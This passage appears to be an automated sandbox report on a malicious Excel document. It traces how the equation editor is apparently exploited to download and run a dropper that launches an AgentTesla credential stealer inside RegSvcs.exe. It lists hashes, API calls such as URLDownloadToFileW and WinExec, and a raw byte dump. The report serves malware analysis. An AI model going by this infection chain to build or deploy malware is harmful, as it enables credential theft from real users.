C>T$RzEf<k=t$BVmB1@1@2@1@g/@BI2@3@3@2@2@2@BEBVF8pF@(FfT$fAFF3fA^
2024-10-01 05:44:59 UTC	1369	IN	Data Raw: 89 94 24 a8 08 00 00 e8 62 fe ff ff 8a 44 24 54 a8 03 0f 85 d5 7f 02 00 a8 04 0f 85 ae 7f 02 00 33 db 6a 10 89 5c 24 20 c7 44 24 24 10 00 00 00 e8 e3 dd 00 00 83 c4 04 6a 04 89 44 24 1c 88 18 e8 d3 dd 00 00 83 c4 04 3b c3 0f 84 94 7f 02 00 c7 00 01 00 00 00 89 44 24 24 8d 7c 24 18 8d 44 24 28 e8 67 02 00 00 84 c0 0f 84 e7 01 00 00 8d 54 24 40 52 8b c7 e8 c3 05 00 00 8b 74 24 24 83 06 ff 75 16 8b 44 24 18 50 e8 5f d9 00 00 83 c4 04 56 e8 56 d9 00 00 83 c4 04 b0 01 84 c0 0f 84 c2 01 00 00 8b 44 24 44 3d fe 0f 00 00 0f 87 50 7f 02 00 8b 44 24 40 50 8d 8c 24 ac 08 00 00 51 e8 ca dc 00 00 ff 44 24 1c 83 c4 08 33 f6 33 ff 0f b7 9c 74 a8 08 00 00 53 e8 0f fb 00 00 83 c4 04 85 c0 74 11 53 e8 d9 fa 00 00 83 c4 04 85 c0 0f 85 4a 01 00 00 66 83 bc 74 a8 08 00 00 00 Data Ascii: $bD$T3j\$ D$$jD$;D$$\|$D$(gT$@Rt$$uD$P_VVD$D=PD$@P$QD$33tStSJft

Target ID:	0
Start time:	01:44:04
Start date:	01/10/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13faf0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	01:44:53
Start date:	01/10/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:44:58
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\coolz.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\coolz.exe
Imagebase:	0x400000
File size:	1'179'411 bytes
MD5 hash:	0FCFEEFEF9E389286B0EF7E97E1E7F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:45:03
Start date:	01/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\coolz.exe
Imagebase:	0x250000
File size:	45'248 bytes
MD5 hash:	19855C0DC5BEC9FDF925307C57F9F5FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.622210442.0000000002001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.622128316.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	14.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	82.8%
Total number of Nodes:	87
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03670659 Relevance: 3.1, APIs: 2, Instructions: 85
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(0367064B), ref: 03670659

Part of subcall function 03670673: URLDownloadToFileW.URLMON(00000000,03670684,?,00000000,00000000), ref: 036706E4

Memory Dump Source

Source File: 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Offset: 03670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3670000_EQNEDT32.jbxd

Similarity

API ID: DownloadFileLibraryLoad
String ID:
API String ID: 2776762486-0
Opcode ID: d6987a045facd75ba26c0f95839d28146f126a3ccbf5ce549aa33850c6294914
Instruction ID: 8058cde8abfcb2b0a10fc2128c40fce08958340dd03a7555b0b4a4a85e8420d8
Opcode Fuzzy Hash: d6987a045facd75ba26c0f95839d28146f126a3ccbf5ce549aa33850c6294914
Instruction Fuzzy Hash: 7D21D0A140C7C12BC722E3704E7AB95BF247B83210F5CCACEE4D50A4D3A3549111C76A

Function 0367072D Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WinExec.KERNEL32(?,00000001), ref: 0367073A

Part of subcall function 0367074D: ExitProcess.KERNEL32(00000000), ref: 03670752

Memory Dump Source

Source File: 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Offset: 03670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3670000_EQNEDT32.jbxd

Similarity

API ID: ExecExitProcess
String ID:
API String ID: 4112423671-0
Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
Instruction ID: 141da5dcc8c8550669c13c466e0fe453a9436fa8b4732b8101cbd1da117697c9
Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
Instruction Fuzzy Hash: 01F02299904342E1CB70F23C8D8CBEBAB54AF61300FCC8957A8C108189D168C4C3CE39

Function 036705CD Relevance: 1.6, APIs: 1, Instructions: 148
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03670684,?,00000000,00000000), ref: 036706E4

Memory Dump Source

Source File: 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Offset: 03670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3670000_EQNEDT32.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: e5ef0d30604d0cbe1e988d60bc230905a07a66275c6e9ce8e0e2b2db62b4b4d4
Instruction ID: 39a8146a7501f3bd85aa262dd5156fd8cadf64130b0855779553a593ff833479
Opcode Fuzzy Hash: e5ef0d30604d0cbe1e988d60bc230905a07a66275c6e9ce8e0e2b2db62b4b4d4
Instruction Fuzzy Hash: 4441AD9580C7C12FC722E7704E7E696BF247B93100F9CCACEE4D50A593E364A215C7AA

Function 036705E9 Relevance: 1.6, APIs: 1, Instructions: 132
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03670684,?,00000000,00000000), ref: 036706E4

Memory Dump Source

Source File: 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Offset: 03670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3670000_EQNEDT32.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: f6ad061ff166841e7d9c879704d56adf4df1d99ad3949f62cc587a8f611696da
Instruction ID: 19f16fd56efc3c2958374ae34c4fec818f12de6d7aacb8d7aed48536fd3ba20e
Opcode Fuzzy Hash: f6ad061ff166841e7d9c879704d56adf4df1d99ad3949f62cc587a8f611696da
Instruction Fuzzy Hash: 6B41BDA540C7C12FC722E7304E7AA96BF246B93500F9CCACEE4D50A193E3A49215866A

Function 03670673 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Offset: 03670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3670000_EQNEDT32.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: ec4b3779f637f0a97b9fa8dddecddab56ae1ecf1eb0f6bf9bd909d02e84e46c8
Instruction ID: 0791316b0ffb65ab538c32c69f4c87884012b99529c11e2b9fcc77666fbd6d84
Opcode Fuzzy Hash: ec4b3779f637f0a97b9fa8dddecddab56ae1ecf1eb0f6bf9bd909d02e84e46c8
Instruction Fuzzy Hash: 37219AA190C7D12BCB22E3704D7EB95BF242B82610F5CCACEE4950A4D3A3A49111C766

Function 036706E2 Relevance: 1.6, APIs: 1, Instructions: 58
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03670684,?,00000000,00000000), ref: 036706E4

Memory Dump Source

Source File: 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Offset: 03670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3670000_EQNEDT32.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
Instruction ID: a581df53d1333800dea651abee028d152bc5990c437bfa86bc22c054035aac62
Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
Instruction Fuzzy Hash: 46114C34504342BAC720E6548D4DBDAF765EB92710FD8C05AE1404D2C9F2A0D443CA39

Function 0367074D Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 03670752

Memory Dump Source

Source File: 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Offset: 03670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3670000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Function 03670754 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Offset: 03670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3670000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: c6a061fab75dd9c36eb3d0410aabe5ad7ce379417606045d5cd876c2c76a523f
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: AED05235202A02CFC304DB04CA84E92F36AFFC8620B68C268E0004B71AD330E892CEA4

Non-executed Functions

Function 036705B4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(036705A2), ref: 036705B4

Memory Dump Source

Source File: 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Offset: 03670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3670000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: b7b4861573d227a319e0d3d3b4271b12a1c6512c02d20c709d9f03fa24bb5fa3
Instruction ID: 1b7ad1370f0fb3b2928247b7fd13ee53ff7359fb4bfa2c0f57900ed388acdb5b
Opcode Fuzzy Hash: b7b4861573d227a319e0d3d3b4271b12a1c6512c02d20c709d9f03fa24bb5fa3
Instruction Fuzzy Hash: D911229980E7C02FC722E7301E7A086BF60799300479C89CFD4D84F1A3E2649729C3B6

Analysis Process: RegSvcs.exePID: 3688, Parent PID: 3660COMMON

Executed Functions

Function 0026BFA8 Relevance: 4.8, Strings: 2, Instructions: 2321COMMON

Download Yara Rule

Strings

fw+, xrefs: 0026BFBF
fw+, xrefs: 0026BFDD

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID: fw+$fw+
API String ID: 0-2062818375
Opcode ID: da55c68b737ee8acbe84304aba5e1fa6d0607c57e0af460f3ce5c22e0e2089a5
Instruction ID: b76d9d1329cfd29893fd102e10556d7130980829ea5f125180b6b13277de7e00
Opcode Fuzzy Hash: da55c68b737ee8acbe84304aba5e1fa6d0607c57e0af460f3ce5c22e0e2089a5
Instruction Fuzzy Hash: 62332C31D1071A8EDB11EF68C8846ADF7B1FF99300F15C69AE449B7211EB70AAD5CB81

Function 00268C30 Relevance: 4.1, Strings: 1, Instructions: 2858COMMON

Download Yara Rule

Strings

fw+, xrefs: 002695AD

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID: fw+
API String ID: 0-2144958705
Opcode ID: e094aa60052f1f91bd8d78cd957a6e124433b68d5cb9af6ddcf9661a54951c72
Instruction ID: f78f67d6c525485eeee3e275d4a27dfaa1ac5ccab82f963d91cc46ecfdf22648
Opcode Fuzzy Hash: e094aa60052f1f91bd8d78cd957a6e124433b68d5cb9af6ddcf9661a54951c72
Instruction Fuzzy Hash: BE63E431D10B1A8EDB51EF68C884699F7B1EF99300F11D79AE458B7121EB70AAD4CF81

Function 0026F488 Relevance: 1.9, Strings: 1, Instructions: 605COMMON

Download Yara Rule

Strings

9W, xrefs: 0026F4F2

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID: 9W
API String ID: 0-532340081
Opcode ID: 08bbd638edb52d4195baf5456d1dcdbc4bda09780d53e47853f9fe82612fa413
Instruction ID: 67eb321bbde7ea77b6752a8977427dee345bc4021e705daf801d1bc4b9cea5d5
Opcode Fuzzy Hash: 08bbd638edb52d4195baf5456d1dcdbc4bda09780d53e47853f9fe82612fa413
Instruction Fuzzy Hash: 17423F31E106198FCB54EF74D99569EB7B2BFC9300F5086AAE409AB650EF70AD81CF40

Function 00466F20 Relevance: .7, Instructions: 736COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622139092.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_460000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e25d253a3f50b9efadf31191c0f9c3247d496ec960fdbee08ef64b23c33155e
Instruction ID: 85732d22c3344a56490c57fdc99eef93b0a6f2de33f598f4f2c1ab409c239e61
Opcode Fuzzy Hash: 0e25d253a3f50b9efadf31191c0f9c3247d496ec960fdbee08ef64b23c33155e
Instruction Fuzzy Hash: 4142B530B002048FDB54EB78D4957AFB7E2BB85314F54842AE406EB781EF74ED429B96

Function 00462150 Relevance: .5, Instructions: 519COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622139092.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_460000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f00ecfa22c236ed66cdeec1bc9884cb64915a3a15a9770e9f999b68af415a530
Instruction ID: e95f2f39eea42ec7b814257448077c8dfe65ac5a368b1e33836da751b7c723aa
Opcode Fuzzy Hash: f00ecfa22c236ed66cdeec1bc9884cb64915a3a15a9770e9f999b68af415a530
Instruction Fuzzy Hash: D5029130B006159FDB14EB74D5956AEB7E2BFC4300F24842AE406EB791EFB4ED428B95

Function 002647B8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 294ff36f02baa58a799c917c3a74c0d6c57ef14ffe5a27b9abbd4f145c8579b2
Instruction ID: 14fda72c7ae899efa3bad9f65d78aa9025fff2b719f32339a77f183df1ecdf53
Opcode Fuzzy Hash: 294ff36f02baa58a799c917c3a74c0d6c57ef14ffe5a27b9abbd4f145c8579b2
Instruction Fuzzy Hash: 4CB18E70E20209DFDF10DFA9C89579EBBF2AF88314F148129D854E7294EB749C95CB85

Function 00263BA0 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95cfb003776ba7792f8c003b3dd49c8154943e94ca27261b37bad173ff7ca82
Instruction ID: 8707037bbfbf925a06723e095f8b8a090843b6bfb72012ecdd97c9a53755a111
Opcode Fuzzy Hash: c95cfb003776ba7792f8c003b3dd49c8154943e94ca27261b37bad173ff7ca82
Instruction Fuzzy Hash: 18916E70E102098FDF14DFA9C8857DEBBF2AF88314F148529E815E7290DB749A95CB91

Function 0026E812 Relevance: 4.8, Strings: 3, Instructions: 1039COMMON

Download Yara Rule

Strings

7W, xrefs: 0026F011
T%W, xrefs: 0026EFCA
7W, xrefs: 0026EAFC

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID: T%W$7W$7W
API String ID: 0-897067053
Opcode ID: 85e05eb6fa03f7dcff2a1bfece603c7dd97c9aff6cbae28f6a80738b24853166
Instruction ID: 4f64ea1c027554b9cd6824db4f340f3ffa6bf5347e413f141e9f70b0b949149b
Opcode Fuzzy Hash: 85e05eb6fa03f7dcff2a1bfece603c7dd97c9aff6cbae28f6a80738b24853166
Instruction Fuzzy Hash: 2C923434A10205CFDB64DF68C588A5DBBF2FB85314F6584AAE409EB251DB35ED86CF80

Function 00266007 Relevance: 1.9, Strings: 1, Instructions: 665COMMON

Download Yara Rule

Strings

,W, xrefs: 0026613D

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID: ,W
API String ID: 0-3254143563
Opcode ID: 626167bcbb8fd6760ba5ae3a38f37bf827f92922e49903feeece106c2ffcc14a
Instruction ID: dc07d52414e38fce3b2c93e2484e2903b183f6f60a59cbef856e2e0241a0b31f
Opcode Fuzzy Hash: 626167bcbb8fd6760ba5ae3a38f37bf827f92922e49903feeece106c2ffcc14a
Instruction Fuzzy Hash: 9E32A330B21301CFDB546F78A4A526E76A3FBC9345B60883CE006DB791DE75DD829B91

Function 00461348 Relevance: 1.7, Strings: 1, Instructions: 437COMMON

Download Yara Rule

Strings

&55p, xrefs: 0046139A

Memory Dump Source

Source File: 00000006.00000002.622139092.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_460000_RegSvcs.jbxd

Similarity

API ID:
String ID: &55p
API String ID: 0-1955183375
Opcode ID: cd7e0378dc8a6038eb7dcd6bcbe9a07ab2fd9d35e84a51b43360cf3e71dfd571
Instruction ID: 84d050bafbc42c6e920de0921ab03ea3e412496c48270256982eec8acd2a89c1
Opcode Fuzzy Hash: cd7e0378dc8a6038eb7dcd6bcbe9a07ab2fd9d35e84a51b43360cf3e71dfd571
Instruction Fuzzy Hash: 44F14030B102048FDB58EBB4C49576FB7A2BF85300F24852AE416AB7A5DF74DD46CB92

Function 0026841D Relevance: 1.6, Strings: 1, Instructions: 347COMMON

Download Yara Rule

Strings

T%W, xrefs: 0026852C

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID: T%W
API String ID: 0-2299022286
Opcode ID: 3469bb5c9b8c306ea31be4ee86a32af27e5fd2e7d5505817bee7e0b3c69457c1
Instruction ID: 9428b81288e7f1aeea6ad38ccb7ad9e95db2c696a2bf6f20c8890eef9dd789a9
Opcode Fuzzy Hash: 3469bb5c9b8c306ea31be4ee86a32af27e5fd2e7d5505817bee7e0b3c69457c1
Instruction Fuzzy Hash: 5BC17135B101058FDB14DF68D895AAEB7F2EF88310F248569E406EB3A1DE34ED81CB91

Function 00460F98 Relevance: 1.5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

Strings

7W, xrefs: 0046115D

Memory Dump Source

Source File: 00000006.00000002.622139092.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_460000_RegSvcs.jbxd

Similarity

API ID:
String ID: 7W
API String ID: 0-2168058111
Opcode ID: 25396c196b1afc5ae99d66a2fd8324982e6f74de3556142780442226603ea907
Instruction ID: 9b768f681fee40969c4c9bf9adf3e24895e5d2ffb9860c92c9947c02f061d492
Opcode Fuzzy Hash: 25396c196b1afc5ae99d66a2fd8324982e6f74de3556142780442226603ea907
Instruction Fuzzy Hash: 4EA19130A00214CFDB14EB64C155B5EB7E2AF84311F58C46AE40AEB7A1EB79ED41CB85

Function 0046133E Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

&55p, xrefs: 0046139A

Memory Dump Source

Source File: 00000006.00000002.622139092.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_460000_RegSvcs.jbxd

Similarity

API ID:
String ID: &55p
API String ID: 0-1955183375
Opcode ID: 1bc55701e5327ae722c8fd2ac12834d2a9098cff08bbf8155044fe1638d45d65
Instruction ID: 8393027dc4caa782dd94d9c5942d9d5e9e8aa4f3e32ce3df5ce9736c49b4c653
Opcode Fuzzy Hash: 1bc55701e5327ae722c8fd2ac12834d2a9098cff08bbf8155044fe1638d45d65
Instruction Fuzzy Hash: 4D618E70A112048FDB54EBA4C4917AFB7F2BF85300F648929E406EB795DB749D82CF91

Function 00468250 Relevance: .9, Instructions: 905COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622139092.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_460000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fff25ab97290b4f8ba516b0d9d57858c1ec10e2f5fc9519ac2a7162e0113a928
Instruction ID: d76b8b9afb6f4d0a0ac0c7fc78e8b2a3b607932869afe39a145905021a170830
Opcode Fuzzy Hash: fff25ab97290b4f8ba516b0d9d57858c1ec10e2f5fc9519ac2a7162e0113a928
Instruction Fuzzy Hash: FE724230A00214CFDB64EB64C49575EB7A2BF85300F6089AEE409BB791DF75AD82CF95

Function 00466390 Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622139092.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_460000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba8f8fd11f2a4f1b29c9259e19a48e3f5f1c63ed974ae27a0d675c45629f7b7
Instruction ID: 02f63ee31c8ededa88b8c715d1e2ebeffc5c67805cffa8791bbb1d01f95c1f6e
Opcode Fuzzy Hash: 3ba8f8fd11f2a4f1b29c9259e19a48e3f5f1c63ed974ae27a0d675c45629f7b7
Instruction Fuzzy Hash: 5C029F30A002148FDF24DF68D4846AEB7E2FB85304F25846BE419EB351EB78ED85CB56

Function 002687C8 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84660e0ec29c33633269fb6b8a19bdab4b417a439d19f05f240e180c1e419274
Instruction ID: c535eab0d4af6f8b6405f71c4c355d93c8921eda6c8bde80809931127d29bf7e
Opcode Fuzzy Hash: 84660e0ec29c33633269fb6b8a19bdab4b417a439d19f05f240e180c1e419274
Instruction Fuzzy Hash: FBD1C371B102058FDB14DF68D8847AEBBB2FF85310F24866AE409EB391DA70DD91CB91

Function 00460488 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622139092.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_460000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d056866dca360f870ef61fec291e8ffc4b4a336299b30cbca7c3d2742e81b85
Instruction ID: bdacbec288b91d63c076c481f04e8843787f22c034968792376e1c1c75157cff
Opcode Fuzzy Hash: 4d056866dca360f870ef61fec291e8ffc4b4a336299b30cbca7c3d2742e81b85
Instruction Fuzzy Hash: 65916030B002048FDB54DBB8C49576F7BE2AFC5310F10852AE40AEB795EE74ED428B96

Function 00260FC8 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe787256baa34b1974c9c2c3137ec2da7f0d5c43f4aec9ec9ecb48cbd408e15e
Instruction ID: 0ac0ad550d172a0ed4c997ec692c72b6198e607af68e78a70435e2cd64f16241
Opcode Fuzzy Hash: fe787256baa34b1974c9c2c3137ec2da7f0d5c43f4aec9ec9ecb48cbd408e15e
Instruction Fuzzy Hash: C6817530A1415A8FDF24CF69C4D07ADBBB1EB56310F6C8596D848DB296C624EDE0CB61

Function 00260BFB Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622100653.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a262a612b3a9a99c0e3efe695f489c7f0908e4d253ad1eedad2cfedf5a51a5e5
Instruction ID: 86b6f9f0c430418cd0d436c209e3a1681abb02d5c1b5e91c0554c089fc14049e
Opcode Fuzzy Hash: a262a612b3a9a99c0e3efe695f489c7f0908e4d253ad1eedad2cfedf5a51a5e5
Instruction Fuzzy Hash: D581D730A213C1CFD705BFB4E99905C3BA2ABDA20B340955BD0429FE65EE301995CF92

Function 0046A100 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622139092.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_460000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbf78a4d1e829084230e7cfb29e41c7f1937ba887daa52f8ed79aa4d6ee9c840
Instruction ID: f320d7b9fb2a5066fe8a64b6b29601d4dee0fb3e0399a3fb3de1f80451439f76
Opcode Fuzzy Hash: cbf78a4d1e829084230e7cfb29e41c7f1937ba887daa52f8ed79aa4d6ee9c840
Instruction Fuzzy Hash: 6F814E30B006089FDB14EBA8C591AAEB7F6FF85304F54842AE405EB355EB74ED428F56

Function 00463A80 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622139092.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

